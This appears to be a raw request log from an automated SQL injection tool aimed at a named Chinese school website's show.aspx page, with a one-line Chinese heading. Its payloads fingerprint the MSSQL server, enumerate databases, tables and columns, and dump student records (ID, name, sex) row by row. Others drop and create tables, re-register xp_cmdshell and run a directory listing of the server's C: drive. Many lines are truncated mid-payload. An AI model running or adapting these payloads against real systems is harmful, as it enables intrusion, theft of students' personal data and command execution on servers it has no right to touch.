SQL注入自动扫描工具中的语句
包括猜解数据库库名、表名、字段名、字段内容(表内容)、表条数,以及测试相关的权限。
(mssql/mysql)
==================================
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user=0--
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20db_name()%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@version%3E1--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20@@servername%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20user%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20cast(is_member(0x640062005f006f0077006e0065007200)%20as%20nvarchar(1))%2bchar
(select%20top%20%201%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
(select%20top%20%202%20dbid,name%20from%20[master].[dbo].[sysdatabases]%20order%20by%20[dbid])%20t%20order%20by%20[dbid]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%200%3C(select%20top%201%20cast([name]%20as%20nvarchar(4000))%2bchar(94)%20from
([description]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%202%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%203%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%204%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%205%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%206%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%207%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%208%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%209%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(256))%20from(select%20top%2010%
20id,name%20from%20[main]..[sysobjects]%20where%20xtype=char(85)%20and%20status%3E0%20order%20by%20id)%20t%20order%20by%20id%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(id%20as%20nvarchar(20))%2bchar(124)%20from%20[main]..
202%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
203%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
204%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
205%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
206%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
207%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
208%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
209%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2010%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20top%201%20cast(name%20as%20varchar(8000))%20from%20(select%20top%
2011%20colid,name%20from%20[main]..[syscolumns]%20where%20id=869578136%20order%20by%20colid)%20t%20order%20by%20colid%20desc)%3E0--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20[main]..
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%201%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%202%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%203%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%204%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%205%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%206%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%207%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%208%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%209%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%20
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2010%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2011%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2012%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2013%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
20[%D1%A7%BA%C5]%20desc%20)%3E0--%20and%201=1
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2014%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2015%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2016%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2017%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2018%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(32))%2bchar(94)%2bisnull(cast([%D0%D5%C3%FB]%20as%20nvarchar(4000)),char(32))%2bchar(94)%2bisnull(cast([%D0%D4%B1%F0]%20as%20nvarchar(4000)),char(32))%
20from%20(select%20top%2019%D1%A7%BA%C5,%D0%D5%C3%FB,%D0%D4%B1%F0%20from%20[main]..[student]%20where%201=1%20order%20by%20[%D1%A7%BA%C5])%20t%20order%20by%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(0x64726f70207461626c6520666f6f666f6f666f6f3b435245415445205441424c45205b666f6f666f6f666f6f5d285b526573756c745478745d206e76617263686172283430303029204e554c4c
293b62756c6b20696e73657274205b666f6f666f6f666f6f5d2066726f6d2027633a5c273b416c746572205461626c65205b666f6f666f6f666f6f5d2061646420696420696e74204e4f54204e554
([type]%20as%20nvarchar(4000))%20from(select%20top%20%201%20*%20from%20foofoofoo%20order%20by%20[name])%20t%20order%20by%20[name]%20desc)--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;drop%20table%20foofoofoo;create%20table%20foofoofoo([id]%20[int]%20identity%20
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
(1,1)%20not%20null,[name]%20[nvarchar]%20(300)%20not%20null,[depth]%20[int]%20not%20null,[isfile]%20[nvarchar]%20(50)%20null);--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20and%20(select%20cast(count(*)%20as%20varchar(8000))%2bchar(94)%20from%20foofoofoo)%
200x730070005f004f004100430072006500610074006500,%200x780070006c006f006700370030002e0064006c006c00--%20and%201=1
GET http://xgzx.whcm.com.cn/show.aspx?xt=student_manager_reward&id=73%20;declare%20@z%20nvarchar(4000)%20set%20@z=0x640069007200200063003a005c00%20insert%
20into%20[foofoofoo](resulttxt)%20exec%20master.dbo.xp_cmdshell%20@z;alter%20table%20[foofoofoo]%20add%20id%20int%20not%20null%20identity%20(1,1)--%20and%
201=1
GET http://xgzx.w